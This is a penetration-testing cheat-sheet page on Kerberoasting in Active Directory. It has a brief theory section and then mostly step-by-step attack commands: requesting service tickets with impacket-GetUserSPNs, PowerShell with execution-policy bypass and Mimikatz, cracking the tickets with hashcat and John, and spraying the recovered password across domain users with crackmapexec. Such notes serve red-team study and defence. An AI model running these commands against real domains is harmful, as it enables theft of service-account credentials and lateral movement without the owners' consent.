Kerberoast

Theory

Kerberoasting is an extremely common attack in active directory environments which targets Active Directory accounts with the SPN value set. Common accounts with the SPN (Service Principal Name) set are service accounts such as IIS User/MSSQL etc.

Kerberoasting involves requesting a Kerb Service Ticket (TGS) from a Windows Domain Machine or Kali Box using something like GetUserSPN’s.py. The problem with TGS is once the the DC looks up the target SPN it encrypts the TGS with the NTLM Password Hash of the targeted user account.

Having a Credential

Step 1: Impacket-GetUserSPNs

Use impacket-GetUserSPNs to gather SPNs. Must hava valid credential:

impacket-GetUserSPNs.py '<domain>/<username>:<password>' -dc-ip <target_ip> -request

Step 2: Crack the TGS ticket with hashcat

Save the TGS ticket as hash.txt and crack it with hashcat mode 13100:

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

Having a Shell

Step 1: GetUserSPNs

Transfer the GetUserSPNs.ps1 script from the following Github repo to the victim machine and run it:

https://github.com/nidem/kerberoast

powershell -ep bypass
.\GetUserSPNs.ps1

Step 2: Request service tickets

Execute the following two commands in PowerShell:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<SPN>'

Or request ticket with Mimikatz:

.\mimikatz.exe
    privilege::debug
    kerberos::ask /target:<spn>

Step 3: Export service ticket to kirbi file

Transfer /usr/share/windows-resources/mimikatz/x64/mimikatz.exe to the victim machine and export service ticket:

.\mimikatz.exe
    privilege::debug
    kerberos::list /export

Download the kirbi file to Kali.

Step 4: Crack the kirbi file with John

Convert the kirbi file to John's format:

python3 /usr/share/windows-resources/kerberoast/kirbi2john.py '<kirbi_file>' > hash.txt

Note that this kirbi2john.py script is also from the "kerberoast" Github repo mentioned above. Don't use the Kali built-in kirbi2john, it does not work by the time of writing.

Crack the hash with John:

john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Password Spray

Note that users might reuse the same password for different accounts. Once we get a plaintext password, spray it on the username list you collectedfrom net user /domain with crackmapexec:

crackmapexec smb <target_ip> -u users.txt -p <password>

Reference

PreviousKerberos NextAS-REP Roast

Last updated 3 years ago

hashtagTheory

hashtagHaving a Credential

hashtagStep 1: Impacket-GetUserSPNs

hashtagStep 2: Crack the TGS ticket with hashcat

hashtagHaving a Shell

hashtagStep 1: GetUserSPNs

hashtagStep 2: Request service tickets

hashtagStep 3: Export service ticket to kirbi file

hashtagStep 4: Crack the kirbi file with John

hashtagPassword Spray

hashtagReference